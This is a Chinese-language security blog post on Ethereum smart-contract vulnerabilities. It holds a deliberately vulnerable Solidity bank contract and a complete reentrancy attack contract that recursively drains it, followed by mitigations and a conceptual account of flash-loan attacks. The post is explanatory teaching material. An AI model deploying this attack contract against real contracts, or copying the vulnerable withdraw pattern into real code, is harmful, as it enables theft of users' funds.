<!DOCTYPE html><html lang="zh-CN"><head><meta charset="utf-8"><meta name="X-UA-Compatible" content="IE=edge"><meta name="author" content="zhangMini"><title>区块链安全 · Mini's blog</title><meta name="description" content="以太坊合约安全问题Solidity常见漏洞类型
Reentrancy（重入攻击）
Integer Overflow and Underflow（整数溢出和下溢）
Access Contorl（访问控制）
Unchecked Return Values For Low Level Calls（未严格判"><meta name="keywords" content="Security, life"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="renderer" content="webkit"><link rel="short icon" href="/images/favicon.png" type="image/x-icon"><link rel="stylesheet" href="/css/style.css"><link rel="stylesheet" href="/css/blog_basic.css"><link rel="stylesheet" href="/css/font-awesome.min.css"><link rel="alternate" type="application/atom+xml" title="ATOM 1.0" href="/atom.xml"><meta name="generator" content="Hexo 6.3.0"></head><body><div class="sidebar animated fadeInDown"><div class="logo-title"><div class="title"><img src="/images/logo@2x.png" style="width:127px;"><h3 title=""><a href="/">Mini's blog</a></h3><div class="description"><p>Nothing lasts forever.</p></div></div></div><ul class="social-links"></ul><div class="footer"><a target="_blank" href="/"><span>Theme by </span></a><a target="_blank" rel="noopener" href="https://www.caicai.me"> CaiCai </a><span>&</span><a target="_blank" rel="noopener" href="https://github.com/Ben02/hexo-theme-Anatole"> Ben</a><div class="by_farbox"><a href="https://hexo.io/zh-cn/" target="_blank">Proudly published with Hexo&#65281;</a></div></div></div><div class="main"><div class="page-top animated fadeInDown"><div class="nav"><li><a href="/">首页</a></li><li><a href="/about">关于</a></li><li><a href="/archives">归档</a></li><li><a href="/tags">tags</a></li></div><div class="information"><div class="back_btn"><li><a class="fa fa-chevron-left" onclick="window.history.go(-1)"> </a></li></div><div class="avatar"><img src="/images/favicon.png"></div></div></div><div class="autopagerize_page_element"><div class="content"><div class="post-page"><div class="post animated fadeInDown"><div class="post-title"><h3><a>区块链安全</a></h3></div><div class="post-content"><h1 id="以太坊合约安全问题"><a href="#以太坊合约安全问题" class="headerlink" title="以太坊合约安全问题"></a>以太坊合约安全问题</h1><h2 id="Solidity常见漏洞类型"><a href="#Solidity常见漏洞类型" class="headerlink" title="Solidity常见漏洞类型"></a>Solidity常见漏洞类型</h2><ul>
<li>Reentrancy（重入攻击）</li>
<li>Integer Overflow and Underflow（整数溢出和下溢）</li>
<li>Access Contorl（访问控制）</li>
<li>Unchecked Return Values For Low Level Calls（未严格判断不安全函数调用返回值）</li>
<li>Denial of Service（拒绝服务）</li>
<li>Bad Randomness（随机数不安全）</li>
<li>Front Running（交易抢先）</li>
<li>Time Manipulation（时间篡改）</li>
<li>Short Address Attack（短地址攻击）</li>
<li>…</li>
</ul>
<h2 id="Reentrancy"><a href="#Reentrancy" class="headerlink" title="Reentrancy"></a>Reentrancy</h2><p>发生可重入漏洞的条件：</p>
<ul>
<li>调用了外部的合约且该合约不安全</li>
<li>外部合约的函数调用早于状态变量的修改</li>
</ul>
<p>至于有关可重入中的交易函数和回退函数在另一篇博客有写</p>
<h3 id="代码演示"><a href="#代码演示" class="headerlink" title="代码演示"></a>代码演示</h3><p>漏洞代码如下，这段代码实现的是一个类似银行的合约，用户可以向 <strong><code>IDMoney</code></strong> 存储Ether，账户可以查询自己&#x2F;他人在此合约的余额，同时也能通过 <strong><code>withdraw()</code></strong> 进行转账</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">pragma solidity ^0.4.10;</span><br><span class="line"></span><br><span class="line">contract IDMoney &#123;</span><br><span class="line">    address owner;</span><br><span class="line">    mapping (address =&gt; uint256) balances;  // 记录每个打币者存入的资产情况</span><br><span class="line"></span><br><span class="line">    event withdrawLog(address, uint256);</span><br><span class="line"></span><br><span class="line">    function IDMoney() &#123; owner = msg.sender; &#125;</span><br><span class="line">    function deposit() payable &#123; balances[msg.sender] += msg.value; &#125;</span><br><span class="line">    function withdraw(address to, uint256 amount) &#123;</span><br><span class="line">        require(balances[msg.sender] &gt; amount);</span><br><span class="line">        require(this.balance &gt; amount);</span><br><span class="line"></span><br><span class="line">        withdrawLog(to, amount);  // 打印日志，方便观察 reentrancy</span><br><span class="line"></span><br><span class="line">        to.call.value(amount)();  // 使用 call.value()() 进行 ether 转币时，默认会发所有的 Gas 给外部</span><br><span class="line">        balances[msg.sender] -= amount;</span><br><span class="line">    &#125;</span><br><span class="line">    function balanceOf() returns (uint256) &#123; return balances[msg.sender]; &#125;</span><br><span class="line">    function balanceOf(address addr) returns (uint256) &#123; return balances[addr]; &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<blockquote>
<p>上述代码的问题在于转币的方法用的是 <strong><code>call.value()()</code></strong> 的方式，这种方法会将剩余的 GAS 全部给予外部调用（ <strong><code>fallback</code></strong> 函数），而 <strong><code>send</code></strong> 和 <strong><code>transfer</code></strong> 会有2300 GAS 的限制。</p>
<p>在进行Ether交易时目标地址是个合约地址，那么默认会调用该合约的 <strong><code>fallback</code></strong> 函数，如果该合约的 <strong><code>fallback</code></strong> 函数中又调用了 <strong><code>withdraw()</code></strong> 函数，那么就会将公共钱包合约里的Ether全部提出，造成可重入漏洞。</p>
</blockquote>
<p>攻击代码如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line">contract Attack &#123;</span><br><span class="line">    address owner;</span><br><span class="line">    address victim;</span><br><span class="line"></span><br><span class="line">    modifier ownerOnly &#123; require(owner == msg.sender); _; &#125;</span><br><span class="line"></span><br><span class="line">    function Attack() payable &#123; owner = msg.sender; &#125;</span><br><span class="line"></span><br><span class="line">    // 设置已部署的 IDMoney 合约实例地址</span><br><span class="line">    function setVictim(address target) ownerOnly &#123; victim = target; &#125;</span><br><span class="line"></span><br><span class="line">    // deposit Ether to IDMoney deployed</span><br><span class="line">    function step1(uint256 amount) ownerOnly payable &#123;</span><br><span class="line">        if (this.balance &gt; amount) &#123;</span><br><span class="line">            victim.call.value(amount)(bytes4(keccak256(&quot;deposit()&quot;)));</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    // withdraw Ether from IDMoney deployed</span><br><span class="line">    function step2(uint256 amount) ownerOnly &#123;</span><br><span class="line">        victim.call(bytes4(keccak256(&quot;withdraw(address,uint256)&quot;)), this, amount);</span><br><span class="line">    &#125;</span><br><span class="line">    // selfdestruct, send all balance to owner</span><br><span class="line">    function stopAttack() ownerOnly &#123;</span><br><span class="line">        selfdestruct(owner);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function startAttack(uint256 amount) ownerOnly &#123;</span><br><span class="line">        step1(amount);</span><br><span class="line">        step2(amount / 2);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function () payable &#123;</span><br><span class="line">        if (msg.sender == victim) &#123;</span><br><span class="line">            // 再次尝试调用 IDCoin 的 sendCoin 函数，递归转币</span><br><span class="line">            victim.call(bytes4(keccak256(&quot;withdraw(address,uint256)&quot;)), this, msg.value);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="解决方法"><a href="#解决方法" class="headerlink" title="解决方法"></a>解决方法</h3><ul>
<li>使用其他交易函数</li>
<li>先修改状态变量再进行转账</li>
<li>使用互斥锁<ul>
<li>在代码执行过程中添加一个锁定合约的状态变量防止再次调用该函数</li>
</ul>
</li>
<li>使用OpenZeppelin的ReentrancyGuard库</li>
</ul>
<h2 id="Flashload-attack"><a href="#Flashload-attack" class="headerlink" title="Flashload attack"></a>Flashload attack</h2><p><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/360131349">闪电贷科普 | 知乎</a></p>
<p>作为DeFi贷款类型之一，闪贷攻击是对特定平台智能合约安全性的滥用，攻击者通常会借入大量不需要抵押品的资金。然后，他们在一家交易所操纵加密资产的价格，并迅速在另一家交易所转售。过程很快，攻击者会多次重复这个过程，然后完成并消失得无影无踪。</p>
<h3 id="以太坊实现闪电贷套利的流程"><a href="#以太坊实现闪电贷套利的流程" class="headerlink" title="以太坊实现闪电贷套利的流程"></a>以太坊实现闪电贷套利的流程</h3><ol>
<li>用户将调用控制权交给闪电贷合约</li>
<li>闪电贷合约调用来自外部的套利合约程序中的执行函数，将请求的借款金额发送给套利合约，套利合约进行套利操作</li>
<li>套利合约完成套利，将借款归还给闪电贷合约，执行函数完成工作，控制权还给闪电贷合约</li>
<li>闪电贷合约检查还款金额是否正确，正确则套利交易成功，否则失败</li>
</ol>
<p>在上面这个过程中，相应的函数是动态调用的，闪电贷合约需要检查归还金额是否正确才会结束，因此控制权的转移过程是随时可以发生的，也就是可重入的。同时需要注意的事，以太坊账户资产是以数值余额的形式存在，重入会带来双花的可能，这也是存在漏洞的地方。调用外部合约的主要危险之一是它们可以接管控制，而这些来自外部的合约程序一旦有漏洞，攻击者可以通过反复调用实现攻击，即可重入攻击。在闪电贷攻击事件中，<strong>可重入</strong>是实现闪电贷的基础。</p>
<img src="/2023/09/21/Blockchain-attacks/The_DAO.png" class="" title="The DAO 攻击流程">

<blockquote>
<p>就好比说，攻击者合约将资产抵押给A银行（项目A借款池）进行贷款，银行A在未完成记账结算之前就开始放款，而银行A完成记账结算流程意味着闪电贷交易要成功（原子性），这时候资产被A入库记账。但由于银行A和其他银行之间的信息不同步（合约函数之间的状态不同步），攻击者在A银行还未完成资产入库记账时（即被攻击合约贷款流程未结束时，这时候闪电贷工作流程还未结束，合约函数调用还可以进行），再次以该资产在B、C等其他银行进行抵押贷款（重入），待流程结束，攻击者已经完成闪电贷攻击并获利</p>
</blockquote>
<h3 id="闪电贷创建者工具"><a href="#闪电贷创建者工具" class="headerlink" title="闪电贷创建者工具"></a>闪电贷创建者工具</h3><p>许多平台可以通过工具和API创建闪电贷</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://furucombo.app/">Furucomcombo.app</a></li>
<li><a target="_blank" rel="noopener" href="https://equalizer.finance/">Equalizer.finance</a></li>
<li><a target="_blank" rel="noopener" href="https://cryptowizards.net/">CryptoWizards.net</a></li>
</ul>
</div><div class="post-footer"><div class="meta"><div class="info"><i class="fa fa-sun-o"></i><span class="date">2023-09-21</span><i class="fa fa-tag"></i><a class="tag" href="/tags/Blockchain/" title="Blockchain">Blockchain </a></div></div></div></div><div class="share"><div class="evernote"><a class="fa fa-bookmark" href="javascript:(function(){EN_CLIP_HOST='http://www.evernote.com';try{var%20x=document.createElement('SCRIPT');x.type='text/javascript';x.src=EN_CLIP_HOST+'/public/bookmarkClipper.js?'+(new%20Date().getTime()/100000);document.getElementsByTagName('head')[0].appendChild(x);}catch(e){location.href=EN_CLIP_HOST+'/clip.action?url='+encodeURIComponent(location.href)+'&amp;title='+encodeURIComponent(document.title);}})();" ref="nofollow" target="_blank"></a></div><div class="weibo"><a class="fa fa-weibo" href="javascript:void((function(s,d,e){try{}catch(e){}var f='http://service.weibo.com/share/share.php?',u=d.location.href,p=['url=',e(u),'&amp;title=',e(d.title),'&amp;appkey=2924220432'].join('');function a(){if(!window.open([f,p].join(''),'mb',['toolbar=0,status=0,resizable=1,width=620,height=450,left=',(s.width-620)/2,',top=',(s.height-450)/2].join('')))u.href=[f,p].join('');};if(/Firefox/.test(navigator.userAgent)){setTimeout(a,0)}else{a()}})(screen,document,encodeURIComponent));"></a></div><div class="twitter"><a class="fa fa-twitter" target="_blank" rel="noopener" href="http://twitter.com/home?status=,http://example.com/2023/09/21/Blockchain-attacks/,Mini's blog,区块链安全,;"></a></div></div><div class="pagination"><ul class="clearfix"><li class="pre pagbuttons"><a class="btn" role="navigation" href="/2023/10/07/TLS/" title="TLS">上一篇</a></li><li class="next pagbuttons"><a class="btn" role="navigation" href="/2023/09/16/Solidity/" title="Solidity">下一篇</a></li></ul></div></div></div></div></div><script src="/js/jquery.js"></script><script src="/js/jquery-migrate-1.2.1.min.js"></script><script src="/js/jquery.appear.js"></script></body></html>